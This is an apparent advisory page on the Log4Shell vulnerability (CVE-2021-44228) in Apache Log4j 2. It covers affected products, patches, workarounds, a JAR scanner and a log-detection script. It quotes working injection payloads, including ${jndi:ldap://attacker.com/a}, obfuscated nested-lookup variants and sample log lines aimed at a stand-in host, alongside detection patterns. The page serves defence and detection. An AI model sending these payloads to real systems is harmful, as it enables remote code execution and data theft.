CVE-2021-44228
📋 TL;DR
CVE-2021-44228 (Log4Shell) is a critical (CVSS 3.1 10.0) remote code execution vulnerability in Apache Log4j 2. Log4j 2 performs string substitution on log messages, and its ${jndi:...} lookup resolves a name through JNDI, so any attacker-controlled string that reaches a log call makes the JVM contact an attacker-run LDAP or RMI server and load what it returns (a remote class, or on JVMs that refuse remote codebases, a deserialization gadget already on the classpath). Any application that bundles a vulnerable log4j-core and logs attacker-influenced input is exposed, and that input can arrive through HTTP headers (User-Agent, X-Forwarded-For), URL paths, form fields, usernames, or any other value that ends up in a log line. Log4j 1.x has no lookup mechanism and is not affected by this CVE.
💻 Affected Systems
- Apache Log4j 2 (log4j-core 2.0-beta9 through 2.14.1; see How to Verify for the exact ranges)
- Any Java application or appliance that bundles a vulnerable log4j-core, directly or through a framework; log4j-api on its own does not contain the vulnerable JndiLookup class
📦 What is this software?
Apache Log4j 2 is one of the most widely used logging libraries for Java; the vulnerable lookup code ships in the log4j-core artifact, which most applications pull in transitively through frameworks or vendor products rather than on purpose. Because it is bundled so widely, this CVE is tracked against the following products in addition to Log4j itself:
- Advanced Malware Protection Virtual Private Cloud Appliance by Cisco
- Capital by Siemens
- Common Services Platform Collector by Cisco
- Comos by Siemens
- Contact Center Management Portal by Cisco
- Crosswork Platform Infrastructure by Cisco
- Crosswork Zero Touch Provisioning by Cisco
- Cyber Vision Sensor Management Extension by Cisco
- Email Security by Sonicwall
- Energyip by Siemens
- Evolved Programmable Network Manager by Cisco
- Fedora by Fedoraproject
- Finesse by Cisco
- Fxos by Cisco
- Gma Manager by Siemens
- Head End System Universal Device Integration System by Siemens
- Integrated Management Controller Supervisor by Cisco
- Log4j by Apache
- Mendix by Siemens
- Mindsphere by Siemens
- Navigator by Siemens
- Network Dashboard Fabric Controller by Cisco
- Network Insights For Data Center by Cisco
- Nx by Siemens
- Packaged Contact Center Enterprise by Cisco
- Rhythmyx by Percussion
- Siguard Dsa by Siemens
- Snow Commander by Snowsoftware
- Synchro by Bentley
- Synchro 4d by Bentley
- Teamcenter by Siemens
- Unified Communications Manager IM & Presence Service by Cisco
- Unified Contact Center Enterprise by Cisco
- Unified Contact Center Management Portal by Cisco
- Vesys by Siemens
- Video Surveillance Operations Manager by Cisco
- Virtualized Infrastructure Manager by Cisco
- Vm Access Proxy by Snowsoftware
- Xcode by Apple
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary code, install malware, exfiltrate data, and pivot to other systems in the network.
Likely Case
Remote code execution leading to data theft, ransomware deployment, or cryptocurrency mining on vulnerable servers.
If Mitigated
Limited impact where message lookups are disabled or the JndiLookup class has been removed, and where egress filtering stops the JVM from reaching attacker infrastructure. Egress filtering on its own is a partial control: an attacker who already has a foothold can host the LDAP/RMI server inside the network, and DNS lookups alone are enough to confirm that a target is vulnerable and to leak small amounts of data.
🎯 Exploit Status
Mass exploitation has been observed in the wild since public disclosure in December 2021, and the CVE is in the CISA Known Exploited Vulnerabilities catalog (see References). A payload as simple as ${jndi:ldap://attacker.com/a} in any logged field triggers the lookup. Obfuscated variants such as ${${lower:j}ndi:ldap://attacker.com/a} or ${${::-j}ndi:ldap://attacker.com/a} are resolved to the same thing inside Log4j and defeat filters that match only the literal string.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.17.0 or later for Java 8 and newer (2.15.0 was the first release to fix this CVE; 2.16.0 and 2.17.0 also fix the follow-on CVE-2021-45046 and CVE-2021-45105), 2.12.3 for Java 7 (2.12.2 fixes this CVE), 2.3.1 for Java 6
Vendor Advisory: https://logging.apache.org/log4j/2.x/security.html
Restart Required: Yes (the library is loaded into the JVM at startup; replacing the JAR on disk changes nothing until every affected process is restarted)
Instructions:
1. Identify every application that bundles log4j-core, including copies nested inside WAR/EAR/fat JARs and inside vendor appliances (for those, follow the vendor advisories in References).
2. Update log4j-core to a fixed release for your Java version (see Patch Version above). Updating log4j-api alone does not fix the problem.
3. Restart all affected applications.
4. Verify the fix: confirm the version of the log4j-core that is actually loaded, check that no stale copy of the old JAR remains on any classpath, and re-test with a benign lookup against a host you control.
🔧 Temporary Workarounds
Disable message lookups (Log4j 2.10 through 2.14.1 only; earlier releases ignore the setting)
All platforms: set the system property below, or the equivalent environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true, and restart the JVM
-Dlog4j2.formatMsgNoLookups=true
Caveat: Apache later found this setting insufficient (CVE-2021-45046) when a non-default Pattern Layout uses a Context Lookup or a Thread Context Map pattern; prefer removing the class or upgrading.
Remove JndiLookup class
Linux/macOS: delete the vulnerable class from every copy of log4j-core, including copies nested inside WAR/EAR/fat JARs, then restart the JVM
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
🧯 If You Can't Patch
- Restrict outbound connections from application hosts: block LDAP (389/636), RMI (1099) and any other unexpected egress to untrusted destinations, and monitor DNS, since attackers use DNS lookups to confirm a hit and to exfiltrate data
- Treat WAF rules that match ${jndi: as defence in depth only: nested lookups such as ${${lower:j}ndi: and ${::-j}ndi: bypass literal matches, and payloads can arrive in any logged field (headers, URL paths, form fields, usernames), not only the request body
🔍 How to Verify
Check if Vulnerable:
A deployment is affected if it loads log4j-core 2.0-beta9 through 2.14.1, excluding the backported fixes 2.3.1 (Java 6 line) and 2.12.2 (Java 7 line). 2.15.0 is not affected by this CVE but is affected by CVE-2021-45046, so anything below the Patch Version above still needs an update. Check build dependency trees (Maven/Gradle), and more importantly what is actually on disk, since vendor products ship their own copies.
Check Version:
unzip -p log4j-core-*.jar META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties
unzip -l log4j-core-*.jar | grep JndiLookup.class
The first command prints the version Maven stamped into the JAR; the second shows whether JndiLookup.class is still present (no output means it has been removed, which is the class-removal workaround).
Verify Fix Applied:
Confirm that the log4j-core loaded by every JVM, not only the one named in the build file, is 2.17.0 or later (or 2.12.2 or later / 2.3.1 on the older Java lines), and that the process was restarted after the JAR changed.
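Checking one JAR by hand does not scale to a fleet, and the copies that get missed are the ones nested inside WAR/EAR/fat JARs. The following scanner is an added example for this page, not code from Apache or from any vendor listed above: it walks a directory tree, opens every archive (recursing into nested archives), reads the version Maven stamps into pom.properties, applies the affected ranges from the section above, and reports whether JndiLookup.class is still present. It assumes Python 3.8+ and uses only the standard library; the archive layout it builds in the usage comment is constructed for the example.

```python
"""Added example: find log4j-core copies (including nested ones) and classify
them for CVE-2021-44228. Standard library only; Python 3.8+ assumed."""
import io
import os
import re
import zipfile

# Version ranges affected by CVE-2021-44228 (NVD configurations):
# [2.0-beta9, 2.3.1), [2.4, 2.12.2), [2.13.0, 2.15.0)
VULNERABLE_RANGES = [((2, 0, 0), (2, 3, 1)), ((2, 4, 0), (2, 12, 2)), ((2, 13, 0), (2, 15, 0))]
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are
    dropped because every 2.0 pre-release falls inside the first range."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return tuple(int(n or 0) for n in m.groups())


def version_is_vulnerable(version):
    v = parse_version(version)
    if v is None:
        return False
    return any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)


def inspect_archive(zf, path):
    """One finding per log4j-core inside zf, recursing into nested archives."""
    findings = []
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        findings.append({
            "path": path,
            "version": version,
            "vulnerable_version": version_is_vulnerable(version),
            "jndi_lookup_present": JNDI_LOOKUP in names,   # False after class removal
        })
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):            # WEB-INF/lib/*.jar, shaded jars, ...
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(inner, f"{path}!{name}"))
    return findings


def scan_tree(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        findings.extend(inspect_archive(zf, full))
                except zipfile.BadZipFile:
                    continue
    return findings


def verdict(finding):
    """Exploitable via CVE-2021-44228 only if the version is in range AND
    JndiLookup.class is still in the JAR (the class-removal workaround)."""
    if parse_version(finding["version"]) is None:
        return "unknown version (inspect manually)"
    if not finding["vulnerable_version"]:
        # Not affected by this CVE; 2.15.0/2.16.0 still need the later fixes
        # (CVE-2021-45046, CVE-2021-45105), so also compare against 2.17.0.
        return "fixed"
    return "vulnerable" if finding["jndi_lookup_present"] else "mitigated (JndiLookup removed)"


if __name__ == "__main__":
    import sys
    # Usage: python log4j_scan.py /opt/app   (constructed example path)
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{verdict(f):<32} {f['version']:<10} {f['path']}")
```

A "fixed" verdict only means this CVE does not apply; a 2.15.0 or 2.16.0 finding still needs the later releases from the Patch Version line. The scanner reads pom.properties rather than the JAR file name, because vendor builds routinely rename or shade the JAR.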
📡 Detection & Monitoring
Log Indicators:
Search every logged field (access logs, application logs, authentication logs) for lookup syntax, not just for the jndi keyword, because attackers nest lookups to hide it:
- ${jndi:
- ${${ (a nested lookup inside request data is almost always obfuscation)
- ${lower:
- ${upper:
- ${env:
- ${sys:
- ${java:
- ${date:
- ${ctx:
- ${::- (empty-key default value, e.g. ${::-j})
lower, upper, env, sys, java, date and ctx are legitimate Log4j lookups and may appear in log4j configuration files, but they have no business appearing inside request data.
Network Indicators:
- Outbound LDAP/RMI/DNS requests from applications to suspicious domains
- Unusual Java process spawning
SIEM Query (Splunk-style; the parentheses make the grouping explicit, since AND/OR precedence differs between search languages):
source="*log*" AND ("${jndi:" OR "${${" OR "${lower:" OR "${upper:" OR "${env:" OR "${sys:" OR "${::-")
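Literal substring searches miss payloads that spell out jndi through nested lookups. The detection below is an added example for this page, not code from Apache or from any of the referenced tools: it collapses the innermost ${...} in each line the way Log4j's StrSubstitutor does for the lookups attackers use for obfuscation (lower, upper, and the :- default value syntax that also covers ${env:X:-j} and ${::-j}), then reports any jndi lookup together with its target, and flags other unresolved lookups as suspicious. The log lines and IP addresses are constructed for the example; it assumes Python 3.8+.

```python
"""Added example: normalise Log4j lookup obfuscation and detect JNDI payloads
in log lines. Standard library only; Python 3.8+ assumed."""
import re

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve_one(body):
    """Resolve a single innermost lookup body the way Log4j would for the
    lookups attackers abuse. Returns None when the value cannot be known
    offline (env, sys, date, ctx, java without a default)."""
    if ":-" in body:                       # StrSubstitutor default delimiter
        expr, default = body.split(":-", 1)
    else:
        expr, default = body, None
    prefix, sep, value = expr.partition(":")
    prefix = prefix.lower()                # Log4j lower-cases lookup prefixes
    if prefix == "lower" and sep:
        return value.lower()
    if prefix == "upper" and sep:
        return value.upper()
    if default is not None:                # ${env:NOPE:-j}, ${::-j}, ${sys:x:-j}
        return default
    return None


def normalize(text, max_rounds=20):
    """Repeatedly collapse innermost lookups. Returns (normalised text,
    list of jndi targets seen, count of lookups that could not be resolved)."""
    state = {"targets": [], "unresolved": 0}

    def repl(m):
        body = m.group(1)
        prefix, _, rest = body.partition(":")
        if prefix.lower() == "jndi":       # never resolve; record and stop here
            state["targets"].append(rest)
            return "[JNDI]"
        out = _resolve_one(body)
        if out is None:
            state["unresolved"] += 1
            return "[LOOKUP]"
        return out

    for _ in range(max_rounds):
        new = INNER.sub(repl, text)
        if new == text:
            break
        text = new
    return text, state["targets"], state["unresolved"]


def classify(line):
    """'log4shell' if a jndi lookup is reachable, 'suspicious' if lookup syntax
    remains that we could not resolve, else 'clean'."""
    text, targets, unresolved = normalize(line)
    if targets:
        return "log4shell", targets
    if unresolved or "${" in text:
        return "suspicious", []
    return "clean", []


def scan_lines(lines):
    return [(i, *classify(line)) for i, line in enumerate(lines, 1)]


# Constructed sample access-log lines (addresses are documentation ranges).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7/a}"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${sys:java.version}"',
]

if __name__ == "__main__":
    for lineno, verdict, targets in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {lineno}: {verdict} {targets}")
```

The normaliser deliberately stops at the jndi prefix instead of resolving it, and it leaves a marker for lookups it cannot evaluate offline, so a line is never downgraded to "clean" just because part of it was unknown. Run it over web server, application and authentication logs, not only the request body, since the payload lands wherever the value is logged.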
🔗 References
- http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html
- http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html
- http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
- http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
- http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html
- http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html
- http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html
- http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html
- http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2022/Dec/2
- http://seclists.org/fulldisclosure/2022/Jul/11
- http://seclists.org/fulldisclosure/2022/Mar/23
- http://www.openwall.com/lists/oss-security/2021/12/10/1
- http://www.openwall.com/lists/oss-security/2021/12/10/2
- http://www.openwall.com/lists/oss-security/2021/12/10/3
- http://www.openwall.com/lists/oss-security/2021/12/13/1
- http://www.openwall.com/lists/oss-security/2021/12/13/2
- http://www.openwall.com/lists/oss-security/2021/12/14/4
- http://www.openwall.com/lists/oss-security/2021/12/15/3
- https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf
- https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf
- https://github.com/cisagov/log4j-affected-db
- https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228
- https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/
- https://logging.apache.org/log4j/2.x/security.html
- https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
- https://security.netapp.com/advisory/ntap-20211210-0007/
- https://support.apple.com/kb/HT213189
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- https://twitter.com/kurtseifried/status/1469345530182455296
- https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001
- https://www.debian.org/security/2021/dsa-5020
- https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html
- https://www.kb.cert.org/vuls/id/930724
- https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html
- https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-44228